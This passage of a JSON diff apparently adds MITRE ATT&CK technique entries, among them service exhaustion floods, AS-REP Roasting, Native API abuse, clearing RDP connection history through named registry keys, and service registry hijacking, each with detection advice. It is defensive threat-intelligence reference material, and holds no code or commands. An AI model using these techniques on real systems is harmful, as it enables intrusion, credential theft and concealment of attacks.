"https://www.ghacks.net/2017/09/19/first-chrome-extension-with-javascript-crypto-miner-detected/" + }, + { + "source_name": "xorrior chrome extensions macOS", + "description": "Chris Ross. (2019, February 8). No Place Like Chrome. Retrieved April 27, 2021.", + "url": "https://www.xorrior.com/No-Place-Like-Chrome/" + }, + { + "source_name": "Chrome Extensions Definition", + "description": "Chrome. (n.d.). What are Extensions?. Retrieved November 16, 2017.", + "url": "https://developer.chrome.com/extensions" + }, + { + "source_name": "ICEBRG Chrome Extensions", + "description": "De Tore, M., Warner, J. (2018, January 15). MALICIOUS CHROME EXTENSIONS ENABLE CRIMINALS TO IMPACT OVER HALF A MILLION USERS AND GLOBAL BUSINESSES. Retrieved January 17, 2018.", + "url": "https://www.icebrg.io/blog/malicious-chrome-extensions-enable-criminals-to-impact-over-half-a-million-users-and-global-businesses" + }, + { + "source_name": "Malicious Chrome Extension Numbers", + "description": "Jagpal, N., et al. (2015, August). Trends and Lessons from Three Years Fighting Malicious Extensions. Retrieved November 17, 2017.", + "url": "https://static.googleusercontent.com/media/research.google.com/en//pubs/archive/43824.pdf" + }, + { + "source_name": "Chrome Extension C2 Malware", + "description": "Kjaer, M. (2016, July 18). Malware in the browser: how you might get hacked by a Chrome extension. Retrieved November 22, 2017.", + "url": "https://kjaer.io/extension-malware/" + }, + { + "source_name": "Catch All Chrome Extension", + "description": "Marinho, R. (n.d.). \"Catch-All\" Google Chrome Malicious Extension Steals All Posted Data. Retrieved November 16, 2017.", + "url": "https://isc.sans.edu/forums/diary/CatchAll+Google+Chrome+Malicious+Extension+Steals+All+Posted+Data/22976/https:/threatpost.com/malicious-chrome-extension-steals-data-posted-to-any-website/128680/)" + }, + { + "source_name": "Banker Google Chrome Extension Steals Creds", + "description": "Marinho, R. (n.d.). (Banker(GoogleChromeExtension)).targeting. Retrieved November 18, 2017.", + "url": "https://isc.sans.edu/forums/diary/BankerGoogleChromeExtensiontargetingBrazil/22722/" + }, + { + "source_name": "Browser Adrozek", + "description": "Microsoft Threat Intelligence. (2020, December 10). Widespread malware campaign seeks to silently inject ads into search results, affects multiple browsers. Retrieved February 26, 2024.", + "url": "https://www.microsoft.com/en-us/security/blog/2020/12/10/widespread-malware-campaign-seeks-to-silently-inject-ads-into-search-results-affects-multiple-browsers/" + }, + { + "source_name": "Browers FriarFox", + "description": "Raggi, Michael. Proofpoint Threat Research Team. (2021, February 25). TA413 Leverages New FriarFox Browser Extension to Target the Gmail Accounts of Global Tibetan Organizations. Retrieved February 26, 2024.", + "url": "https://www.proofpoint.com/us/blog/threat-insight/ta413-leverages-new-friarfox-browser-extension-target-gmail-accounts-global" + }, + { + "source_name": "Stantinko Botnet", + "description": "Vachon, F., Faou, M. (2017, July 20). Stantinko: A massive adware campaign operating covertly since 2012. Retrieved November 16, 2017.", + "url": "https://www.welivesecurity.com/2017/07/20/stantinko-massive-adware-campaign-operating-covertly-since-2012/" + }, + { + "source_name": "Wikipedia Browser Extension", + "description": "Wikipedia. (2017, October 8). Browser Extension. Retrieved January 11, 2018.", + "url": "https://en.wikipedia.org/wiki/Browser_extension" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-05-09T14:00:00.188Z", + "name": "Service Exhaustion Flood", + "description": "Adversaries may target the different network services provided by systems to conduct a denial of service (DoS). Adversaries often target the availability of DNS and web services, however others have been targeted as well.(Citation: Arbor AnnualDoSreport Jan 2018) Web server software can be attacked through a variety of means, some of which apply generally while others are specific to the software being used to provide the service.\n\nOne example of this type of attack is known as a simple HTTP flood, where an adversary sends a large number of HTTP requests to a web server to overwhelm it and/or an application that runs on top of it. This flood relies on raw volume to accomplish the objective, exhausting any of the various resources required by the victim software to provide the service.(Citation: Cloudflare HTTPflood)\n\nAnother variation, known as a SSL renegotiation attack, takes advantage of a protocol feature in SSL/TLS. The SSL/TLS protocol suite includes mechanisms for the client and server to agree on an encryption algorithm to use for subsequent secure connections. If SSL renegotiation is enabled, a request can be made for renegotiation of the crypto algorithm. In a renegotiation attack, the adversary establishes a SSL/TLS connection and then proceeds to make a series of renegotiation requests. Because the cryptographic renegotiation has a meaningful cost in computation cycles, this can cause an impact to the availability of the service when done in volume.(Citation: Arbor SSLDoS April 2012)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "impact" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "Detection of Endpoint DoS can sometimes be achieved before the effect is sufficient to cause significant impact to the availability of the service, but such response time typically requires very aggressive monitoring and responsiveness. Typical network throughput monitoring tools such as netflow, SNMP, and custom scripts can be used to detect sudden increases in circuit utilization.(Citation: Cisco DoSdetectNetflow) Real-time, automated, and qualitative study of the network traffic can identify a sudden surge in one type of protocol can be used to detect an attack as it starts.\n\nIn addition to network level detections, endpoint logging and instrumentation can be useful for detection. Attacks targeting web applications may generate logs in the web server, application server, and/or database server that can be used to identify the type of attack, possibly before the impact is felt.\n\nExternally monitor the availability of services that may be targeted by an Endpoint DoS.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "Azure AD", + "Office 365", + "SaaS", + "IaaS", + "Linux", + "macOS", + "Google Workspace" + ], + "x_mitre_version": "1.3", + "x_mitre_data_sources": [], + "x_mitre_impact_type": [ + "Availability" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--38eb0c22-6caf-46ce-8869-5964bd735858", + "created": "2020-02-20T15:31:43.613Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1499/002", + "external_id": "T1499.002" + }, + { + "source_name": "Arbor SSLDoS April 2012", + "description": "ASERT Team, Netscout Arbor. (2012, April 24). DDoS Attacks on SSL: Something Old, Something New. Retrieved April 22, 2019.", + "url": "https://www.netscout.com/blog/asert/ddos-attacks-ssl-something-old-something-new" + }, + { + "source_name": "Cisco DoSdetectNetflow", + "description": "Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow. Retrieved April 25, 2019.", + "url": "https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf" + }, + { + "source_name": "Cloudflare HTTPflood", + "description": "Cloudflare. (n.d.). What is an HTTP flood DDoS attack?. Retrieved April 22, 2019.", + "url": "https://www.cloudflare.com/learning/ddos/http-flood-ddos-attack/" + }, + { + "source_name": "Arbor AnnualDoSreport Jan 2018", + "description": "Philippe Alcoy, Steinthor Bjarnason, Paul Bowen, C.F. Chui, Kirill Kasavchnko, and Gary Sockrider of Netscout Arbor. (2018, January). Insight into the Global Threat Landscape - Netscout Arbor's 13th Annual Worldwide Infrastructure Security Report. Retrieved April 22, 2019.", + "url": "https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Report.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-05-24T14:00:00.188Z", + "name": "Compromise Hardware Supply Chain", + "description": "Adversaries may manipulate hardware components in products prior to receipt by a final consumer for the purpose of data or system compromise. By modifying hardware or firmware in the supply chain, adversaries can insert a backdoor into consumer networks that may be difficult to detect and give the adversary a high degree of control over the system. Hardware backdoors may be inserted into various devices, such as servers, workstations, network infrastructure, or peripherals.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "initial-access" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "Perform physical inspection of hardware to look for potential tampering. Perform integrity checking on pre-OS boot mechanisms that can be manipulated for malicious purposes.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--39131305-9282-45e4-ac3b-591d2d4fc3ef", + "created": "2020-03-11T14:28:40.064Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1195/003", + "external_id": "T1195.003" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-10-13T16:01:07.538Z", + "name": "Native API", + "description": "Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.(Citation: NT API Windows)(Citation: Linux Kernel API) These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.\n\nAdversaries may abuse these OS API functions as a means of executing behaviors. Similar to [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), the native API and its hierarchy of interfaces provide mechanisms to interact with and utilize various components of a victimized system.\n\nNative API functions (such as NtCreateProcess) may be directed invoked via system calls / syscalls, but these features are also often exposed to user-mode applications via interfaces and libraries.(Citation: OutFlank System Calls)(Citation: CyberBit System Calls)(Citation: MDSec System Calls) For example, functions such as the Windows API CreateProcess() or GNU fork() will allow programs and scripts to start other processes.(Citation: Microsoft CreateProcess)(Citation: GNU Fork) This may allow API callers to execute a binary, run a CLI command, load modules, etc. as thousands of similar API functions exist for various system operations.(Citation: Microsoft Win32)(Citation: LIBC)(Citation: GLIBC)\n\nHigher level software frameworks, such as Microsoft .NET and macOS Cocoa, are also available to interact with native APIs. These frameworks typically provide language wrappers/abstractions to API functionalities and are designed for ease-of-use/portability of code.(Citation: Microsoft NET)(Citation: Apple Core Services)(Citation: MACOS Cocoa)(Citation: macOS Foundation)\n\nAdversaries may use assembly to directly or in-directly invoke syscalls in an attempt to subvert defensive sensors and detection signatures such as user mode API-hooks.(Citation: Redops Syscalls) Adversaries may also attempt to tamper with sensors and defensive tools associated with API monitoring, such as unhooking monitored functions via [Disable or Modify Tools](https://attack.mitre.org/techniques/T1562/001).", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "execution" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Gordon Long, Box, Inc., @ethicalhax", + "Stefan Kanthak", + "Tristan Madani (Cybereason)" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitoring API calls may generate a significant amount of data and may not be useful for defense unless collected under specific circumstances, since benign use of API functions are common and may be difficult to distinguish from malicious behavior. Correlation of other events with behavior surrounding API function calls using API monitoring will provide additional context to an event that may assist in determining if it is due to malicious behavior. Correlation of activity by process lineage by process ID may be sufficient. \n\nUtilization of the Windows APIs may involve processes loading/accessing system DLLs associated with providing called functions (ex: ntdll.dll, kernel32.dll, advapi32.dll, user32.dll, and gdi32.dll). Monitoring for DLL loads, especially to abnormal/unusual or potentially malicious processes, may indicate abuse of the Windows API. Though noisy, this data can be combined with other indicators to identify adversary activity. ", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "macOS", + "Linux" + ], + "x_mitre_version": "2.2", + "x_mitre_data_sources": [], + "x_mitre_remote_support": false, + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--391d824f-0ef1-47a0-b0ee-c59a75e27670", + "created": "2017-05-31T21:31:17.472Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1106", + "external_id": "T1106" + }, + { + "source_name": "MACOS Cocoa", + "description": "Apple. (2015, September 16). Cocoa Application Layer. Retrieved June 25, 2020.", + "url": "https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/OSX_Technology_Overview/CocoaApplicationLayer/CocoaApplicationLayer.html#//apple_ref/doc/uid/TP40001067-CH274-SW1" + }, + { + "source_name": "Apple Core Services", + "description": "Apple. (n.d.). Core Services. Retrieved June 25, 2020.", + "url": "https://developer.apple.com/documentation/coreservices" + }, + { + "source_name": "macOS Foundation", + "description": "Apple. (n.d.). Foundation. Retrieved July 1, 2020.", + "url": "https://developer.apple.com/documentation/foundation" + }, + { + "source_name": "OutFlank System Calls", + "description": "de Plaa, C. (2019, June 19). Red Team Tactics: Combining Direct System Calls and sRDI to bypass AV/EDR. Retrieved September 29, 2021.", + "url": "https://outflank.nl/blog/2019/06/19/red-team-tactics-combining-direct-system-calls-and-srdi-to-bypass-av-edr/" + }, + { + "source_name": "Redops Syscalls", + "description": "Feichter, D. (2023, June 30). Direct Syscalls vs Indirect Syscalls. Retrieved September 27, 2023.", + "url": "https://redops.at/en/blog/direct-syscalls-vs-indirect-syscalls" + }, + { + "source_name": "GNU Fork", + "description": "Free Software Foundation, Inc.. (2020, June 18). Creating a Process. Retrieved June 25, 2020.", + "url": "https://www.gnu.org/software/libc/manual/html_node/Creating-a-Process.html" + }, + { + "source_name": "CyberBit System Calls", + "description": "Gavriel, H. (2018, November 27). Malware Mitigation when Direct System Calls are Used. Retrieved September 29, 2021.", + "url": "https://www.cyberbit.com/blog/endpoint-security/malware-mitigation-when-direct-system-calls-are-used/" + }, + { + "source_name": "GLIBC", + "description": "glibc developer community. (2020, February 1). The GNU C Library (glibc). Retrieved June 25, 2020.", + "url": "https://www.gnu.org/software/libc/" + }, + { + "source_name": "LIBC", + "description": "Kerrisk, M. (2016, December 12). libc(7) — Linux manual page. Retrieved June 25, 2020.", + "url": "https://man7.org/linux/man-pages//man7/libc.7.html" + }, + { + "source_name": "Linux Kernel API", + "description": "Linux Kernel Organization, Inc. (n.d.). The Linux Kernel API. Retrieved June 25, 2020.", + "url": "https://www.kernel.org/doc/html/v4.12/core-api/kernel-api.html" + }, + { + "source_name": "MDSec System Calls", + "description": "MDSec Research. (2020, December). Bypassing User-Mode Hooks and Direct Invocation of System Calls for Red Teams. Retrieved September 29, 2021.", + "url": "https://www.mdsec.co.uk/2020/12/bypassing-user-mode-hooks-and-direct-invocation-of-system-calls-for-red-teams/" + }, + { + "source_name": "Microsoft CreateProcess", + "description": "Microsoft. (n.d.). CreateProcess function. Retrieved December 5, 2014.", + "url": "http://msdn.microsoft.com/en-us/library/ms682425" + }, + { + "source_name": "Microsoft Win32", + "description": "Microsoft. (n.d.). Programming reference for the Win32 API. Retrieved March 15, 2020.", + "url": "https://docs.microsoft.com/en-us/windows/win32/api/" + }, + { + "source_name": "Microsoft NET", + "description": "Microsoft. (n.d.). What is .NET Framework?. Retrieved March 15, 2020.", + "url": "https://dotnet.microsoft.com/learn/dotnet/what-is-dotnet-framework" + }, + { + "source_name": "NT API Windows", + "description": "The NTinterlnals.net team. (n.d.). Nowak, T. Retrieved June 25, 2020.", + "url": "https://undocumented.ntinternals.net/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-09-08T18:05:28.311Z", + "name": "Clear Network Connection History and Configurations", + "description": "Adversaries may clear or remove evidence of malicious network connections in order to clean up traces of their operations. Configuration settings as well as various artifacts that highlight connection history may be created on a system and/or in application logs from behaviors that require network connections, such as [Remote Services](https://attack.mitre.org/techniques/T1021) or [External Remote Services](https://attack.mitre.org/techniques/T1133). Defenders may use these artifacts to monitor or otherwise analyze network connections created by adversaries.\n\nNetwork connection history may be stored in various locations. For example, RDP connection history may be stored in Windows Registry values under (Citation: Microsoft RDP Removal):\n\n* HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Default\n* HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\n\nWindows may also store information about recent RDP connections in files such as C:\\Users\\\\%username%\\Documents\\Default.rdp and `C:\\Users\\%username%\\AppData\\Local\\Microsoft\\Terminal\nServer Client\\Cache\\`.(Citation: Moran RDPieces) Similarly, macOS and Linux hosts may store information highlighting connection history in system logs (such as those stored in `/Library/Logs` and/or `/var/log/`).(Citation: Apple Culprit Access)(Citation: FreeDesktop Journal)(Citation: Apple Unified Log Analysis Remote Login and Screen Sharing)\n\nMalicious network connections may also require changes to third-party applications or network configuration settings, such as [Disable or Modify System Firewall](https://attack.mitre.org/techniques/T1562/004) or tampering to enable [Proxy](https://attack.mitre.org/techniques/T1090). Adversaries may delete or modify this data to conceal indicators and/or impede defensive analysis.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_contributors": [ + "CrowdStrike Falcon OverWatch" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows", + "Network" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--3975dbb5-0e1e-4f5b-bae1-cf2ab84b46dc", + "created": "2022-06-15T18:00:04.219Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1070/007", + "external_id": "T1070.007" + }, + { + "source_name": "FreeDesktop Journal", + "description": "freedesktop.org. (n.d.). systemd-journald.service. Retrieved June 15, 2022.", + "url": "https://www.freedesktop.org/software/systemd/man/systemd-journald.service.html" + }, + { + "source_name": "Microsoft RDP Removal", + "description": "Microsoft. (2021, September 24). How to remove entries from the Remote Desktop Connection Computer box. Retrieved June 15, 2022.", + "url": "https://docs.microsoft.com/troubleshoot/windows-server/remote/remove-entries-from-remote-desktop-connection-computer" + }, + { + "source_name": "Moran RDPieces", + "description": "Moran, B. (2020, November 18). Putting Together the RDPieces. Retrieved October 17, 2022.", + "url": "https://www.osdfcon.org/presentations/2020/Brian-Moran_Putting-Together-the-RDPieces.pdf" + }, + { + "source_name": "Apple Culprit Access", + "description": "rjben. (2012, May 30). How do you find the culprit when unauthorized access to a computer is a problem?. Retrieved August 3, 2022.", + "url": "https://discussions.apple.com/thread/3991574" + }, + { + "source_name": "Apple Unified Log Analysis Remote Login and Screen Sharing", + "description": "Sarah Edwards. (2020, April 30). Analysis of Apple Unified Logs: Quarantine Edition [Entry 6] – Working From Home? Remote Logins. Retrieved August 19, 2021.", + "url": "https://sarah-edwards-xzkc.squarespace.com/blog/2020/4/30/analysis-of-apple-unified-logs-quarantine-edition-entry-6-working-from-home-remote-logins" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2021-06-07T19:23:33.039Z", + "name": "AS-REP Roasting", + "description": "Adversaries may reveal credentials of accounts that have disabled Kerberos preauthentication by [Password Cracking](https://attack.mitre.org/techniques/T1110/002) Kerberos messages.(Citation: Harmj0y Roasting AS-REPs Jan 2017) \n\nPreauthentication offers protection against offline [Password Cracking](https://attack.mitre.org/techniques/T1110/002). When enabled, a user requesting access to a resource initiates communication with the Domain Controller (DC) by sending an Authentication Server Request (AS-REQ) message with a timestamp that is encrypted with the hash of their password. If and only if the DC is able to successfully decrypt the timestamp with the hash of the user’s password, it will then send an Authentication Server Response (AS-REP) message that contains the Ticket Granting Ticket (TGT) to the user. Part of the AS-REP message is signed with the user’s password.(Citation: Microsoft Kerberos Preauth 2014)\n\nFor each account found without preauthentication, an adversary may send an AS-REQ message without the encrypted timestamp and receive an AS-REP message with TGT data which may be encrypted with an insecure algorithm such as RC4. The recovered encrypted data may be vulnerable to offline [Password Cracking](https://attack.mitre.org/techniques/T1110/002) attacks similarly to [Kerberoasting](https://attack.mitre.org/techniques/T1558/003) and expose plaintext credentials. (Citation: Harmj0y Roasting AS-REPs Jan 2017)(Citation: Stealthbits Cracking AS-REP Roasting Jun 2019) \n\nAn account registered to a domain, with or without special privileges, can be abused to list all domain accounts that have preauthentication disabled by utilizing Windows tools like [PowerShell](https://attack.mitre.org/techniques/T1059/001) with an LDAP filter. Alternatively, the adversary may send an AS-REQ message for each user. If the DC responds without errors, the account does not require preauthentication and the AS-REP message will already contain the encrypted data. (Citation: Harmj0y Roasting AS-REPs Jan 2017)(Citation: Stealthbits Cracking AS-REP Roasting Jun 2019)\n\nCracked hashes may enable [Persistence](https://attack.mitre.org/tactics/TA0003), [Privilege Escalation](https://attack.mitre.org/tactics/TA0004), and [Lateral Movement](https://attack.mitre.org/tactics/TA0008) via access to [Valid Accounts](https://attack.mitre.org/techniques/T1078).(Citation: SANS Attacking Kerberos Nov 2014)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "credential-access" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Yossi Nisani, Cymptom", + "James Dunn, @jamdunnDFW, EY", + "Swapnil Kumbhar", + "Jacques Pluviose, @Jacqueswildy_IT", + "Dan Nutting, @KerberToast" + ], + "x_mitre_detection": "Enable Audit Kerberos Service Ticket Operations to log Kerberos TGS service ticket requests. Particularly investigate irregular patterns of activity (ex: accounts making numerous requests, Event ID 4768 and 4769, within a small time frame, especially if they also request RC4 encryption [Type 0x17], pre-authentication not required [Type: 0x0]).(Citation: AdSecurity Cracking Kerberos Dec 2015)(Citation: Microsoft Detecting Kerberoasting Feb 2018)(Citation: Microsoft 4768 TGT 2017)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "x_mitre_permissions_required": [ + "User" + ], + "x_mitre_system_requirements": [ + "Valid domain account" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--3986e7fd-a8e9-4ecb-bfc6-55920855912b", + "created": "2020-08-24T13:43:00.028Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1558/004", + "external_id": "T1558.004" + }, + { + "source_name": "Harmj0y Roasting AS-REPs Jan 2017", + "description": "HarmJ0y. (2017, January 17). Roasting AS-REPs. Retrieved August 24, 2020.", + "url": "http://www.harmj0y.net/blog/activedirectory/roasting-as-reps/" + }, + { + "source_name": "Microsoft Kerberos Preauth 2014", + "description": "Sanyal, M.. (2014, March 18). Kerberos Pre-Authentication: Why It Should Not Be Disabled. Retrieved August 25, 2020.", + "url": "https://social.technet.microsoft.com/wiki/contents/articles/23559.kerberos-pre-authentication-why-it-should-not-be-disabled.aspx" + }, + { + "source_name": "Stealthbits Cracking AS-REP Roasting Jun 2019", + "description": "Jeff Warren. (2019, June 27). Cracking Active Directory Passwords with AS-REP Roasting. Retrieved August 24, 2020.", + "url": "https://blog.stealthbits.com/cracking-active-directory-passwords-with-as-rep-roasting/" + }, + { + "source_name": "SANS Attacking Kerberos Nov 2014", + "description": "Medin, T. (2014, November). Attacking Kerberos - Kicking the Guard Dog of Hades. Retrieved March 22, 2018.", + "url": "https://redsiege.com/kerberoast-slides" + }, + { + "source_name": "AdSecurity Cracking Kerberos Dec 2015", + "description": "Metcalf, S. (2015, December 31). Cracking Kerberos TGS Tickets Using Kerberoast – Exploiting Kerberos to Compromise the Active Directory Domain. Retrieved March 22, 2018.", + "url": "https://adsecurity.org/?p=2293" + }, + { + "source_name": "Microsoft Detecting Kerberoasting Feb 2018", + "description": "Bani, M. (2018, February 23). Detecting Kerberoasting activity using Azure Security Center. Retrieved March 23, 2018.", + "url": "https://blogs.technet.microsoft.com/motiba/2018/02/23/detecting-kerberoasting-activity-using-azure-security-center/" + }, + { + "source_name": "Microsoft 4768 TGT 2017", + "description": "Microsoft. (2017, April 19). 4768(S, F): A Kerberos authentication ticket (TGT) was requested. Retrieved August 24, 2020.", + "url": "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4768" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Service Registry Permissions Weakness", + "description": "Windows stores local service configuration information in the Registry under HKLM\\SYSTEM\\CurrentControlSet\\Services. The information stored under a service's Registry keys can be manipulated to modify a service's execution parameters through tools such as the service controller, sc.exe, [PowerShell](https://attack.mitre.org/techniques/T1086), or [Reg](https://attack.mitre.org/software/S0075). Access to Registry keys is controlled through Access Control Lists and permissions. (Citation: MSDN Registry Key Security)\n\nIf the permissions for users and groups are not properly set and allow access to the Registry keys for a service, then adversaries can change the service binPath/ImagePath to point to a different executable under their control. When the service starts or is restarted, then the adversary-controlled program will execute, allowing the adversary to gain persistence and/or privilege escalation to the account context the service is set to execute under (local/domain account, SYSTEM, LocalService, or NetworkService).\n\nAdversaries may also alter Registry keys associated with service failure parameters (such as FailureCommand) that may be executed in an elevated context anytime the service fails or is intentionally corrupted.(Citation: TrustedSignal Service Failure)(Citation: Twitter Service Recovery Nov 2017)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Matthew Demaske, Adaptforward", + "Travis Smith, Tripwire" + ], + "x_mitre_detection": "Service changes are reflected in the Registry. Modification to existing services should not occur frequently. If a service binary path or failure parameters are changed to values that are not typical for that service and does not correlate with software updates, then it may be due to malicious activity. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.\n\nTools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current service information. (Citation: TechNet Autoruns) Look for changes to services that do not correlate with known software, patch cycles, etc. Suspicious program execution through services may show up as outlier processes that have not been seen before when compared against historical data.\n\nMonitor processes and command-line arguments for actions that could be done to modify services. Remote access tools with built-in features may interact directly with the Windows API to perform these functions outside of typical system utilities. Services may also be changed through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1086), so additional logging may need to be configured to gather the appropriate data.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [], + "x_mitre_effective_permissions": [ + "SYSTEM" + ], + "x_mitre_permissions_required": [ + "Administrator", + "SYSTEM" + ], + "x_mitre_system_requirements": [ + "Ability to modify service values in the Registry" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--39a130e1-6ab7-434a-8bd2-418e7d9d6427", + "created": "2017-05-31T21:30:49.119Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1058", + "external_id": "T1058" + }, + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/478.html", + "external_id": "CAPEC-478" + }, + { + "source_name": "MSDN Registry Key Security", + "description": "Microsoft. (n.d.). Registry Key Security and Access Rights. Retrieved March 16, 2017.", + "url": "https://msdn.microsoft.com/library/windows/desktop/ms724878.aspx" + }, + { + "source_name": "TrustedSignal Service Failure", + "description": "Hull, D. (2014, May 3). Kansa: Service related collectors and analysis. Retrieved October 10, 2019.", + "url": "https://trustedsignal.blogspot.com/2014/05/kansa-service-related-collectors-and.html" + }, + { + "source_name": "Twitter Service Recovery Nov 2017", + "description": "The Cyber (@r0wdy_). (2017, November 30). Service Recovery Parameters. Retrieved April 9, 2018.", + "url": "https://twitter.com/r0wdy_/status/936365549553991680" + }, + { + "source_name": "TechNet Autoruns", + "description": "Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. Retrieved June 6, 2016.", + "url": "https://technet.microsoft.com/en-us/sysinternals/bb963902" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Virtual Private Server", + "description": "Adversaries may compromise third-party Virtual Private Servers (VPSs) that can be used during targeting. There exist a variety of cloud service providers that will sell virtual machines/containers as a service. Adversaries may compromise VPSs purchased by third-party entities. By compromising a VPS to use as infrastructure, adversaries can make it difficult to physically tie back operations to themselves.(Citation: NSA NCSC Turla OilRig)\n\nCompromising a VPS for use in later stages of the adversary lifecycle, such as Command and Control, can allow adversaries to benefit from the ubiquity and trust associated with higher reputation cloud service providers as well as that added by the compromised third-party.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "resource-development" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + 